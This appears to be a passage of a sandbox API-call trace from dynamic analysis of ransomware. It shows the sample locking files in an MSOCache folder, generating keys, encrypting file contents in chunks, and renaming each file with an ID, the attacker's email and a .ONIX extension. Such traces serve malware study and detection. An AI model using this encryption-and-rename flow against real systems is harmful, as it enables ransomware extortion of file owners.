lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0118.897] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.904] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.904] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.905] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.905] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.915] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0118.915] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.930] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.930] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.940] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.940] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.964] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0118.964] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.971] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.971] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0118.972] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.972] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.987] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0118.987] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0118.993] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.993] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.001] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.001] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0119.027] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0119.027] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0119.034] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.034] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.034] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.034] ReadFile (in: hFile=0x498, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0119.058] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000 [0119.058] WriteFile (in: hFile=0x498, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0119.065] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.065] WriteFile (in: hFile=0x498, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x2b30020 | out: hHeap=0x410000) returned 1 [0119.070] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0119.074] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xb9fa2f7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.074] CloseHandle (hObject=0x498) returned 1 [0119.075] GetProcessHeap () returned 0x410000 [0119.075] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.075] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.077] GetProcessHeap () returned 0x410000 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0119.077] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0119.077] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.077] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.077] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.077] GetLastError () returned 0x0 [0119.078] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0119.078] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.078] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xb80800, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.078] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.078] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.080] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.080] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.080] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.080] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.080] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", dwFileAttributes=0x80) returned 1 [0119.080] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 76 [0119.080] GetProcessHeap () returned 0x410000 [0119.080] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x4d6b80 [0119.080] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" [0119.080] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.080] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=12060672) returned 1 [0119.080] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xb80800 [0119.080] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.081] GetProcessHeap () returned 0x410000 [0119.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.081] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.081] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.082] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.083] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb80800) returned 0x3680020 [0119.085] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb80800) returned 0x4210020 [0119.085] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.085] ReadFile (in: hFile=0x498, lpBuffer=0x3680020, nNumberOfBytesToRead=0xb80800, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xb80800, lpOverlapped=0x0) returned 1 [0119.901] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xb80800, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.901] CloseHandle (hObject=0x498) returned 1 [0119.902] GetProcessHeap () returned 0x410000 [0119.902] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.902] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.904] GetProcessHeap () returned 0x410000 [0119.904] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0119.904] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.904] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.904] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0119.905] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0119.905] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0119.905] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0119.905] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0119.905] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0119.905] GetLastError () returned 0x0 [0119.905] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0119.905] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.905] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2213, nNumberOfBytesToLockHigh=0x0) returned 1 [0119.905] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.906] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0119.907] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.907] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.907] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0119.908] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0119.908] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", dwFileAttributes=0x80) returned 1 [0119.908] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 76 [0119.908] GetProcessHeap () returned 0x410000 [0119.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x4d6b80 [0119.908] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" [0119.908] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0119.908] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=8723) returned 1 [0119.908] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2213 [0119.908] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0119.908] GetProcessHeap () returned 0x410000 [0119.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467908 [0119.908] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467908*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467908*, pdwDataLen=0x367f414*=0x100) returned 1 [0119.908] WriteFile (in: hFile=0x498, lpBuffer=0x467908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467908*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0119.911] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0119.911] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0119.912] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2213) returned 0x4d8b68 [0119.912] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2213) returned 0x4dad88 [0119.913] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.913] ReadFile (in: hFile=0x498, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x2213, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x2213, lpOverlapped=0x0) returned 1 [0119.913] SetFilePointer (in: hFile=0x498, lDistanceToMove=-8723, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.913] WriteFile (in: hFile=0x498, lpBuffer=0x4dad88*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dad88*, lpNumberOfBytesWritten=0x367f44c*=0x2213, lpOverlapped=0x0) returned 1 [0119.914] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0119.914] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dad88 | out: hHeap=0x410000) returned 1 [0119.914] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2213, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0119.914] CloseHandle (hObject=0x498) returned 1 [0119.915] GetProcessHeap () returned 0x410000 [0119.915] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0119.915] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0119.919] GetProcessHeap () returned 0x410000 [0119.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0119.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0119.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0119.919] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0119.919] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0119.919] CloseHandle (hObject=0x3cc) returned 1 [0119.919] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0119.919] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x3b, wMilliseconds=0x123)) [0119.919] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0119.920] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0119.920] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, 